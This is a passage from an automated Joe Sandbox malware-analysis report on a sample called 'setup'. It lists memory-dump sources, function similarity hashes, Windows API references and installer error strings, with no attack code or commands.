                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char_wmkdirexitlongjmpstrcpy
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes
                                                                                                    • API String ID: 1924296003-701587655
                                                                                                    • Opcode ID: cc2e3341f5ee51c3eb5e8f045f80dcf2f37bdd16be13cd24f10186ec495e3453
                                                                                                    • Instruction ID: 4d83a97522242e5d3c7e7d8f32b305b3791dc3dc19de62c70e852ef301780586
                                                                                                    • Opcode Fuzzy Hash: cc2e3341f5ee51c3eb5e8f045f80dcf2f37bdd16be13cd24f10186ec495e3453
                                                                                                    • Instruction Fuzzy Hash: 5BF0D4B05297189BD351BF64D54A31EBAE0BF45705F41C82DE5CC67242C7B988908F86
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: exitlongjmp
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes
                                                                                                    • API String ID: 2266059207-701587655
                                                                                                    • Opcode ID: 3be7228b3e541f74a369731dc520b1e5910d12d8aa4e3a8e0e39872677363a88
                                                                                                    • Instruction ID: b414148bd8258957aa21576877d4a02188829cbd16856c83519944982b6d59d9
                                                                                                    • Opcode Fuzzy Hash: 3be7228b3e541f74a369731dc520b1e5910d12d8aa4e3a8e0e39872677363a88
                                                                                                    • Instruction Fuzzy Hash: 5AF0B2B0809B14DBD711BF60C54636EBBE0BF44705F42CC2CE5C857202C7B868858F86
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: %ls$Error$MakeValidInstallPath: swprintfInvalid path.
                                                                                                    • API String ID: 2030045667-4245211409
                                                                                                    • Opcode ID: a2155821caeaebd0dbcd3420ace4899b215ebe6db604a69c5d010a1809247af0
                                                                                                    • Instruction ID: a8c653be6662703c22bd6fbbcc35f8dfffdcdec3ec0d8289afac807abf595cdc
                                                                                                    • Opcode Fuzzy Hash: a2155821caeaebd0dbcd3420ace4899b215ebe6db604a69c5d010a1809247af0
                                                                                                    • Instruction Fuzzy Hash: 3CF015B550C3009BEB14AF18D58939BBBE0FB80344F00C81DE9C887244D3B9C4889B82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • SelectPathFinishCallback: swprintfInvalid path., xrefs: 001C6080
                                                                                                    • Error, xrefs: 001C6078
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageMutexRelease
                                                                                                    • String ID: Error$SelectPathFinishCallback: swprintfInvalid path.
                                                                                                    • API String ID: 408918528-1918625331
                                                                                                    • Opcode ID: 1ca1b8beec1c4bcc149fd51c6d2d307ee96a3e3c3e9eb0131930565d8654eff0
                                                                                                    • Instruction ID: d5febd86d3e3ae34f4fd5b94afd92255e35a6588ac97b4eba1529ee747f45b28
                                                                                                    • Opcode Fuzzy Hash: 1ca1b8beec1c4bcc149fd51c6d2d307ee96a3e3c3e9eb0131930565d8654eff0
                                                                                                    • Instruction Fuzzy Hash: 0AE0C9B14097009FE310AF68D54976F7BB1BB41301F02882CE59657265DBB8A498DB97
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Error, xrefs: 001C61B0
                                                                                                    • InstallCallback: MakeValidInstallpathInvalid path., xrefs: 001C61B8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageMutexRelease
                                                                                                    • String ID: Error$InstallCallback: MakeValidInstallpathInvalid path.
                                                                                                    • API String ID: 408918528-617575558
                                                                                                    • Opcode ID: dbb7c7980174ace0a177220059ad5fa3040435ad6b83bbbfe075f1624aeb30e5
                                                                                                    • Instruction ID: a013340988c4325ed583541666014edd2b496ec59aa1e3328847ddbb535f72e5
                                                                                                    • Opcode Fuzzy Hash: dbb7c7980174ace0a177220059ad5fa3040435ad6b83bbbfe075f1624aeb30e5
                                                                                                    • Instruction Fuzzy Hash: 23E0BFB65097009FD300AF68E54835EBBF0FB81316F02882DD5D957265D7B59058DF47
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,-00000010,00000001,0139290C), ref: 001CE767
                                                                                                    • GetProcAddress.KERNEL32 ref: 001CE77F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID: GetDpiForMonitor$shcore
                                                                                                    • API String ID: 2574300362-1062703863
                                                                                                    • Opcode ID: cfb961b6f421f17b80e70ab5a2ab5dc72317517b583fada251418ce7f2539225
                                                                                                    • Instruction ID: 04a4055c4f0c5397a004d7aeec002bf10ac17d005fa0817fa1707698fe33cb9a
                                                                                                    • Opcode Fuzzy Hash: cfb961b6f421f17b80e70ab5a2ab5dc72317517b583fada251418ce7f2539225
                                                                                                    • Instruction Fuzzy Hash: 98E012B48053008FC7046F34AA0C21A7EF0BB02305F01893DD4C597215D770E058CB9B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 919077542e773ac6c856cb74ec1d318708b43bf17e87647416562b96156719d9
                                                                                                    • Instruction ID: 4401e6f6c96b100b1a421bcd4c7bb47135faace0f6eb77665e17181b8ab060af
                                                                                                    • Opcode Fuzzy Hash: 919077542e773ac6c856cb74ec1d318708b43bf17e87647416562b96156719d9
                                                                                                    • Instruction Fuzzy Hash: 500247B1628702AFC714DF28C9D5A6AF7E4BF88304F144629F89987651D730E875CFA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a8278265a7ac343f9718b9308e83935aa72483fa4fb957b7f5f470517c8870da
                                                                                                    • Instruction ID: d2006f1b2f99b67d2c62a8add79ab62aea62c6f1e6f06ea2a9a3be4a3c67dc2e
                                                                                                    • Opcode Fuzzy Hash: a8278265a7ac343f9718b9308e83935aa72483fa4fb957b7f5f470517c8870da
                                                                                                    • Instruction Fuzzy Hash: 4EC1EFB0224302DFD325DF28D9D5B6AB7E8FF44744F00492DE895872A1DB70E9A5CBA1
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: freemallocmemcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 603710549-0
                                                                                                    • Opcode ID: 846ebec30aa6856e0e34e935024d18f37fdcebbf18794cb1d1b82f1b89289d01
                                                                                                    • Instruction ID: b5c384f6b6df8f8d50332ea26afeefbfb01a8deb7871e75b1cd83d3f2913b5c5
                                                                                                    • Opcode Fuzzy Hash: 846ebec30aa6856e0e34e935024d18f37fdcebbf18794cb1d1b82f1b89289d01
                                                                                                    • Instruction Fuzzy Hash: 19612475A087458FCB05DF29C58065EBBE1BFCC744F16892EE888AB311D770E9818F82
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: freememcpystrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2208669145-0
                                                                                                    • Opcode ID: db1fde1054ab01750a98cd8570a36ae871b8f03499647bf41f514dc8539149f2
                                                                                                    • Instruction ID: 9baf2eaa57f877a5c13f85adb01d5af24bc9668a9cec4357e25eddbf09f706f0
                                                                                                    • Opcode Fuzzy Hash: db1fde1054ab01750a98cd8570a36ae871b8f03499647bf41f514dc8539149f2
                                                                                                    • Instruction Fuzzy Hash: A0319C716283069FC320DF25C48032FBBE0AFC5752F25896CEC9587340E331D8698B8A
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
